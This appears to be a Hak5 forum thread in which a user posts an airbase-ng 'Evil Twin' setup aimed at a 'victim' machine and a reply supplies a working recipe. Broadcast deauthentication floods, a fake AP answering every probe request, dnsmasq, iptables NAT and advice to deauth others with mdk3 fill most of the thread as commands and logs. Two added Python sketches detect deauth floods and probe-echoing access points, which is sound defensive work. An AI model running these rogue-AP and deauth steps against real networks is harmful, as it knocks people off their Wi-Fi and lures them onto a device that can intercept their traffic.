Hak5 Forums
asciighost

Airbase-ng AP doesn't let my victim connect


I have been working around the Evil Twin Airbase-ng for quite a while and I am unable to get my victim PC, which is my other Windows 10 machine, to connect. It did connect to the AP once (rarely), and when it did it had no internet connection, which has kept me up for some time. I am going to post the process I have performed; please go through the steps and guide me through the issue.

Note: I have tried iptables and echo 1; it didn't help.

Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode
airmon-ng start wlan0

Checking for background processes that can interfere with the work
airmon-ng check wlan0mon    # (assigned new name)

Setting up the Fake AP
airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon
17:19:25 Created tap interface at0
17:19:25 Trying to set MTU on at0 to 1500
17:19:25 Trying to set MTU on wlan0mon to 1800
17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started.
17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"
17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"

 

Deauthorizing clients on another terminal

aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon
17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6

Installing DHCP server
apt-get install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
isc-dhcp-server is already the newest version (4.3.5-3+b1).
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Configuring nano /etc/dhcp/dhcpd.conf

authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.1;
    option domain-name-servers 8.8.8.8;
    range 192.168.1.10 192.168.1.200;
    default-lease-time 600;
    max-lease-time 7200;
}

Installing bridging utilities

apt-get install bridge-utils
Reading package lists... Done
Building dependency tree
Reading state information... Done
bridge-utils is already the newest version (1.5-14).
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Bridging interface
root@kali:~# brctl addbr evil        # name of the bridge I made
root@kali:~# brctl addif evil eth0   # my Ethernet connection
root@kali:~# brctl addif evil at0
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# ifconfig evil up

Starting DHCP server
root@kali:~# systemctl start smbd.service
root@kali:~# dhclient evil

root@kali:~# service isc-dhcp-server restart
root@kali:~# service isc-dhcp-server status
● isc-dhcp-server.service - LSB: DHCP server
   Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled)
   Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS)
    Tasks: 1 (limit: 4915)
   CGroup: /system.slice/isc-dhcp-server.service
           └─2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0

Dec 06 17:32:33 kali systemd[1]: Starting LSB: DHCP server...
Dec 06 17:32:33 kali isc-dhcp-server[2049]: Launching IPv4 server only.
Dec 06 17:32:33 kali dhcpd[2060]: Wrote 11 leases to leases file.
Dec 06 17:32:33 kali dhcpd[2060]: Multiple interfaces match the same subnet: eth0 evil
Dec 06 17:32:33 kali dhcpd[2060]: Multiple interfaces match the same shared network: eth0 evil
Dec 06 17:32:33 kali dhcpd[2061]: Server starting service.
Dec 06 17:32:35 kali isc-dhcp-server[2049]: Starting ISC DHCPv4 server: dhcpd.
Dec 06 17:32:35 kali systemd[1]: Started LSB: DHCP server.

/etc/init.d/isc-dhcp-server start
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.

IP gateway

root@kali:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0        0 eth0
0.0.0.0         192.168.1.1     0.0.0.0         UG    600    0        0 wlan0
192.168.1.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0

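Seen from a monitoring sensor, the setup in the post above leaves two traces: bursts of broadcast deauthentication frames, and one ESSID offered both encrypted and unencrypted (the airbase-ng log shows the same client associating first as WPA2;CCMP and then unencrypted). The following is an added detection example, not part of the original post; the record format, the sample records, the 10-second window and the threshold of 5 are assumptions made for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sensor records, not captured traffic:
# seconds  frame-type  bssid  destination  ssid  security
SAMPLE = """\
0.0 beacon 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff Ryan WPA2
0.1 beacon 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff Ryan OPEN
0.2 beacon 02:00:00:00:00:02 ff:ff:ff:ff:ff:ff Cafe OPEN
5.0 deauth 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff - -
5.5 deauth 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff - -
6.0 deauth 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff - -
6.5 deauth 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff - -
7.0 deauth 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff - -
40.0 deauth 02:00:00:00:00:02 02:00:00:00:00:99 - -
"""

def parse(text):
    """Yield (time, type, bssid, dst, ssid, security) from whitespace-separated records."""
    for line in text.splitlines():
        if line.strip():
            t, kind, bssid, dst, ssid, sec = line.split()
            yield float(t), kind, bssid.lower(), dst.lower(), ssid, sec

def detect(records, window=10.0, threshold=5):
    """Return alerts for broadcast deauth bursts and mixed-security SSIDs."""
    security = defaultdict(set)   # ssid -> security modes seen in beacons
    recent = defaultdict(deque)   # bssid -> timestamps of broadcast deauths
    flooded, alerts = set(), []
    for t, kind, bssid, dst, ssid, sec in records:
        if kind == "beacon":
            security[ssid].add(sec)
        elif kind == "deauth" and dst == BROADCAST:
            q = recent[bssid]
            q.append(t)
            while q and t - q[0] > window:   # drop timestamps outside the window
                q.popleft()
            if len(q) >= threshold and bssid not in flooded:
                flooded.add(bssid)
                alerts.append(("deauth-flood", bssid))
    # Keyed on SSID, not BSSID: a twin can advertise any BSSID, including the real one.
    for ssid, modes in sorted(security.items()):
        if "OPEN" in modes and len(modes) > 1:
            alerts.append(("mixed-security", ssid))
    return alerts

print(detect(parse(SAMPLE)))
```

The single unicast deauth at 40.0 s and the open-only "Cafe" network are included to show what the detector leaves alone.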

Looks like you're trying to deauth and force clients to reconnect to airbase-ng.

First confirm that a machine can connect to this access point and establish a proper IP.

 

Dnsmasq is quicker and cleaner...

Edited by i8igmac

10 hours ago, asciighost said:

@i8igmac I stop deauth after 1 min and I try to connect my phone manually and it doesn't connect

I don't think you have it set up properly. I can try to post commands from memory... (today on my lunch break)

 

 


I use airbase-ng as a quick generic hotspot; it works with almost any Wi-Fi card. airbase-ng can also be used to spoof all probe requests with the use of -P -c 30.

Let's assume you have 2 devices.

One device is simply your internet source and the second device will be your evil hotspot.

I will assume you're already connected to the internet with device 1. It can be a Wi-Fi connection or Ethernet (eth0 in this example).

 

echo 'interface=at0' > /etc/dnsmasq.conf
echo 'dhcp-range=192.168.69.50,192.168.69.150,12h' >> /etc/dnsmasq.conf

airmon-ng start wlan0

airbase-ng -P -c 30 wlan0mon

[Open new console]

ifconfig at0 up 192.168.69.1

dnsmasq

 

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

 

You will need to change eth0 to the proper internet device name.

At this point, if you check ifconfig, you should see that at0 has the IP address 192.168.69.1, and you should have 2 processes running (airbase-ng and dnsmasq).

You can now deauth other machines (I would use mdk3 for deauth). If the machine is outdated enough, it will auto-connect to your airbase-ng, assuming that signal strength is higher.

Edit: you may also need to service stop network-manager.

Edited by i8igmac
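An access point that answers every probe request, as described in the post above, ends up claiming whatever SSID each nearby client asks for, which a normal AP never does. The following is an added detection example, not part of the original post; the record format, the sample records (SSIDs without spaces), the 1-second window and the minimum of 3 SSIDs are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed sensor records, not captured traffic:
# seconds  frame-type  transmitter  receiver  ssid
SAMPLE = """\
1.0 probe-req  02:00:00:00:00:a1 ff:ff:ff:ff:ff:ff HomeWifi
1.1 probe-resp 02:00:00:00:00:ee 02:00:00:00:00:a1 HomeWifi
2.0 probe-req  02:00:00:00:00:a2 ff:ff:ff:ff:ff:ff HotelGuest
2.1 probe-resp 02:00:00:00:00:ee 02:00:00:00:00:a2 HotelGuest
3.0 probe-req  02:00:00:00:00:a3 ff:ff:ff:ff:ff:ff Office
3.1 probe-resp 02:00:00:00:00:ee 02:00:00:00:00:a3 Office
3.2 probe-resp 02:00:00:00:00:01 02:00:00:00:00:a3 Office
4.0 probe-req  02:00:00:00:00:a3 ff:ff:ff:ff:ff:ff Office
4.1 probe-resp 02:00:00:00:00:01 02:00:00:00:00:a3 Office
"""

def parse_frames(text):
    """Yield (time, type, transmitter, receiver, ssid) from whitespace-separated records."""
    for line in text.splitlines():
        if line.strip():
            t, kind, tx, rx, ssid = line.split()
            yield float(t), kind, tx.lower(), rx.lower(), ssid

def find_probe_echoers(frames, window=1.0, min_ssids=3):
    """Return {bssid: [ssids]} for BSSIDs that answered directed probes for many SSIDs."""
    asked = {}                  # (client, ssid) -> time of the latest directed probe request
    echoed = defaultdict(set)   # bssid -> SSIDs it claimed right after a client asked
    for t, kind, tx, rx, ssid in frames:
        if kind == "probe-req":
            asked[(tx, ssid)] = t
        elif kind == "probe-resp":
            asked_at = asked.get((rx, ssid))
            # Count only responses that follow that client's own request for that SSID
            if asked_at is not None and 0 <= t - asked_at <= window:
                echoed[tx].add(ssid)
    # A normal AP answers for its own SSID(s) only; many distinct SSIDs is the anomaly
    return {b: sorted(s) for b, s in echoed.items() if len(s) >= min_ssids}

print(find_probe_echoers(parse_frames(SAMPLE)))
```

An allow-list of known multi-SSID infrastructure BSSIDs would be the natural next filter before alerting.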
